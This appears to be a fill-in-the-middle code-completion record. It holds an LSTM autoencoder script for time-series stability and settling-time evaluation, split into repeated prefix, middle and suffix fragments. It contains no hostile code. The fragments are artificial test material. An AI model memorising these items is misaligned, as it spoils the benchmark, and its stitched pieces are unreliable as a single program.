cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWit | if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigure(self, truth, pred, loss):
fig = plt.figure(figsize=(6, 6))
plt.plot(truth, label='true')
plt.plot(pred, label='reconstructed')
plt.title(f'loss:{np.around(loss, 2)}')
plt.legend()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_eval_result.png')
def printResult(self, stable, unstable, stableStarted):
stableMean, stableStd = float(np.mean(stable)), float(np.std(stable))
resultMean, resultStd = float(np.mean(unstable)), float(np.std(unstable))
print('stableMean:', np.round(stableMean, 2), ' vs. resultMean: ', np.round(resultMean, 2))
print('stableStd: ', np.round(stableStd, 3), ' vs. resultStd: ', np.round(resultStd, 3))
print("==" * 30)
print("unstable time:", self.unstableData.data.time_axis['act_time'].get(0))
print("settling time:", stableStarted * 5, "minutes")
print("stable time:", self.unstableData.data.time_axis['act_time'].get(stableStarted))
print("decision time:", self.unstableData.data.time_axis['act_time'].get(stableStarted + self.windowSize - 1))
print("~~" * 30)
print()
return
def plotPrediction(self, data, model, title, ax):
predictions, loss = self.predict(model, [data])
ax.plot(data, label='true')
ax.plot(predictions[0], label='reconstructed')
ax.set_title(f'{title} (loss:{np.around(loss[0], 2)})')
ax.legend()
| houtImprovement += 1
| conditional_block |
AutoEncoderBasedEvaluation.py | import copy
import numpy as np
import DataLoader
import torch
import seaborn as sns
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import find_peaks
from statsmodels import api as sm
from sklearn.preprocessing import MinMaxScaler
from torch import nn
from LstmAutoEncoder import LstmAutoEncoder
from Model import Model
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class LstmAutoEncoderModel(Model):
def __init__(self, windowSize, maxEpoch, paramIndex, learningRate, threshold):
self.windowSize = windowSize
self.maxEpoch = maxEpoch
self.paramIndex = paramIndex
self.learningRate = learningRate
self.threshold = threshold
self.embeddingDim = 128
self.normalData = DataLoader.NormalDataLoader(self.paramIndex, 'train')
self.unstableData = DataLoader.UnstableDataLoader(self.paramIndex, 'test')
self.wantToShuffle = False
self.statistics = {}
def preProcess(self):
print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses |
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigure(self, truth, pred, loss):
fig = plt.figure(figsize=(6, 6))
plt.plot(truth, label='true')
plt.plot(pred, label='reconstructed')
plt.title(f'loss:{np.around(loss, 2)}')
plt.legend()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_eval_result.png')
def printResult(self, stable, unstable, stableStarted):
stableMean, stableStd = float(np.mean(stable)), float(np.std(stable))
resultMean, resultStd = float(np.mean(unstable)), float(np.std(unstable))
print('stableMean:', np.round(stableMean, 2), ' vs. resultMean: ', np.round(resultMean, 2))
print('stableStd: ', np.round(stableStd, 3), ' vs. resultStd: ', np.round(resultStd, 3))
print("==" * 30)
print("unstable time:", self.unstableData.data.time_axis['act_time'].get(0))
print("settling time:", stableStarted * 5, "minutes")
print("stable time:", self.unstableData.data.time_axis['act_time'].get(stableStarted))
print("decision time:", self.unstableData.data.time_axis['act_time'].get(stableStarted + self.windowSize - 1))
print("~~" * 30)
print()
return
def plotPrediction(self, data, model, title, ax):
predictions, loss = self.predict(model, [data])
ax.plot(data, label='true')
ax.plot(predictions[0], label='reconstructed')
ax.set_title(f'{title} (loss:{np.around(loss[0], 2)})')
ax.legend() | random_line_split | |
AutoEncoderBasedEvaluation.py | import copy
import numpy as np
import DataLoader
import torch
import seaborn as sns
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import find_peaks
from statsmodels import api as sm
from sklearn.preprocessing import MinMaxScaler
from torch import nn
from LstmAutoEncoder import LstmAutoEncoder
from Model import Model
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class LstmAutoEncoderModel(Model):
def __init__(self, windowSize, maxEpoch, paramIndex, learningRate, threshold):
self.windowSize = windowSize
self.maxEpoch = maxEpoch
self.paramIndex = paramIndex
self.learningRate = learningRate
self.threshold = threshold
self.embeddingDim = 128
self.normalData = DataLoader.NormalDataLoader(self.paramIndex, 'train')
self.unstableData = DataLoader.UnstableDataLoader(self.paramIndex, 'test')
self.wantToShuffle = False
self.statistics = {}
def preProcess(self):
print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigu | ruth, pred, loss):
fig = plt.figure(figsize=(6, 6))
plt.plot(truth, label='true')
plt.plot(pred, label='reconstructed')
plt.title(f'loss:{np.around(loss, 2)}')
plt.legend()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_eval_result.png')
def printResult(self, stable, unstable, stableStarted):
stableMean, stableStd = float(np.mean(stable)), float(np.std(stable))
resultMean, resultStd = float(np.mean(unstable)), float(np.std(unstable))
print('stableMean:', np.round(stableMean, 2), ' vs. resultMean: ', np.round(resultMean, 2))
print('stableStd: ', np.round(stableStd, 3), ' vs. resultStd: ', np.round(resultStd, 3))
print("==" * 30)
print("unstable time:", self.unstableData.data.time_axis['act_time'].get(0))
print("settling time:", stableStarted * 5, "minutes")
print("stable time:", self.unstableData.data.time_axis['act_time'].get(stableStarted))
print("decision time:", self.unstableData.data.time_axis['act_time'].get(stableStarted + self.windowSize - 1))
print("~~" * 30)
print()
return
def plotPrediction(self, data, model, title, ax):
predictions, loss = self.predict(model, [data])
ax.plot(data, label='true')
ax.plot(predictions[0], label='reconstructed')
ax.set_title(f'{title} (loss:{np.around(loss[0], 2)})')
ax.legend()
| re(self, t | identifier_name |
AutoEncoderBasedEvaluation.py | import copy
import numpy as np
import DataLoader
import torch
import seaborn as sns
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import find_peaks
from statsmodels import api as sm
from sklearn.preprocessing import MinMaxScaler
from torch import nn
from LstmAutoEncoder import LstmAutoEncoder
from Model import Model
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class LstmAutoEncoderModel(Model):
def __init__(self, windowSize, maxEpoch, paramIndex, learningRate, threshold):
self.windowSize = windowSize
self.maxEpoch = maxEpoch
self.paramIndex = paramIndex
self.learningRate = learningRate
self.threshold = threshold
self.embeddingDim = 128
self.normalData = DataLoader.NormalDataLoader(self.paramIndex, 'train')
self.unstableData = DataLoader.UnstableDataLoader(self.paramIndex, 'test')
self.wantToShuffle = False
self.statistics = {}
def preProcess(self):
|
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
